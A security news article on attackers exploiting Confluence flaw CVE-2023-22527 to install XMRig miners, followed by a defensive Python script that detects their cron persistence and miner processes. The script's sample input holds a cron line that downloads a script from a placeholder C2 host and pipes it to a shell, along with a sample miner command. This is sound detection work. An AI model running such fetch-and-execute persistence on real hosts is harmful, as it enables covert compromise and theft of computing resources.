Exploitation of Weakness in Atlassian Confluence Leads to Illegal Cryptocurrency Mining
Threat actors are actively exploiting a recently patched critical vulnerability in Atlassian Confluence Data Center and Confluence Server to run illicit cryptocurrency mining on susceptible systems.
“The breaches are linked to cybercriminals who utilize methods such as executing shell scripts and XMRig miners, focusing on SSH endpoints, halting rival cryptocurrency mining operations, and securing continuous operation through cron jobs,” Abdelrahman Esmail, a researcher at Trend Micro, mentioned.
The vulnerability being exploited is CVE-2023-22527, a critical remote code execution flaw in older versions of Atlassian Confluence Data Center and Confluence Server that allows unauthenticated attackers to execute arbitrary code. The Australian software company patched the issue in mid-January 2024.
Trend Micro reported a spike in exploitation attempts against the vulnerability between mid-June and the end of July 2024, with attackers using it to deploy the XMRig miner on unpatched hosts. At least three distinct threat actors are believed to be behind the malicious activity:
- Launching the XMRig miner via an ELF file payload delivered through specially crafted requests
- Running a shell script that first terminates competing cryptojacking campaigns (e.g., Kinsing), wipes all existing cron jobs, uninstalls cloud security agents from Alibaba and Tencent, gathers system information, and then installs a new cron job that checks command-and-control (C2) server connectivity every five minutes and deploys the miner
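
The cron-based persistence described in the second bullet leaves a recognisable footprint on the host: a schedule of every five minutes combined with a download-and-execute command, plus an XMRig process in the process list. The following triage script is an added example, not code from Trend Micro's report or from Atlassian; it scans crontab text for that combination and scans ps-style output for XMRig/stratum indicators. The sample crontab and process lines are constructed, and the hostnames and wallet value are placeholders.

```python
"""Triage helper for the cron-based cryptojacking persistence pattern.

Added example (not from the original article). It looks for crontab entries
that both run every five minutes and pipe downloaded content into a shell,
and for process command lines that resemble an XMRig miner. All sample input
is constructed; hostnames use the reserved .invalid TLD.
"""
import re
from dataclasses import dataclass, field

# Minute field "*/5" followed by four wildcard fields: runs every five minutes.
EVERY_FIVE_MIN = re.compile(r"^\s*\*/5\s+\*\s+\*\s+\*\s+\*\s+")
# curl/wget whose output is piped straight into sh or bash.
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
# XMRig binary name or stratum mining-pool URL scheme in a command line.
MINER_TOKENS = re.compile(r"xmrig|stratum\+(tcp|ssl)://", re.IGNORECASE)


@dataclass
class Finding:
    source: str            # "crontab" or "process"
    line: str              # the offending line, stripped
    reasons: list = field(default_factory=list)


def scan_crontab(text: str) -> list:
    """Flag cron entries that combine a 5-minute schedule with download-and-exec."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        reasons = []
        if EVERY_FIVE_MIN.match(line):
            reasons.append("runs every five minutes")
        if DOWNLOAD_EXEC.search(line):
            reasons.append("downloads remote content and pipes it to a shell")
        # Require both traits together to keep false positives low.
        if len(reasons) == 2:
            findings.append(Finding("crontab", line.strip(), reasons))
    return findings


def scan_processes(ps_output: str) -> list:
    """Flag process lines whose command matches XMRig or a stratum pool URL."""
    findings = []
    for line in ps_output.splitlines()[1:]:  # first line is the ps header
        if MINER_TOKENS.search(line):
            findings.append(Finding("process", line.strip(),
                                    ["command line matches XMRig/stratum pattern"]))
    return findings


# Constructed sample input: one benign cron entry and one matching the pattern.
SAMPLE_CRONTAB = """\
# constructed sample crontab
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -fsSL http://c2.example.invalid/update.sh | sh > /dev/null 2>&1
"""

# Constructed sample `ps -eo pid,user,cmd` output; wallet value is a placeholder.
SAMPLE_PS = """\
PID USER COMMAND
1234 confluence /opt/atlassian/confluence/jre/bin/java -Xms1024m -Xmx2048m
4321 confluence /tmp/.x/xmrig -o pool.example.invalid:3333 -u WALLET_PLACEHOLDER -k
"""

if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB) + scan_processes(SAMPLE_PS):
        print(f"[{f.source}] {f.line}")
        for r in f.reasons:
            print(f"    - {r}")
```

On a live host, feed it the output of `crontab -l` for each user (and the contents of /etc/cron.d) and of `ps -eo pid,user,cmd`; a hit on either scanner is a reason to check whether the Confluence instance is still on a vulnerable version, not a confirmation of compromise on its own.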

“Given the continuous exploitation by cybercriminals, CVE-2023-22527 poses a significant security threat to organizations globally,” Esmail cautioned.
“To mitigate the dangers and risks associated with this vulnerability, administrators are urged to update their installations of Confluence Data Center and Confluence Server to the latest versions available immediately.”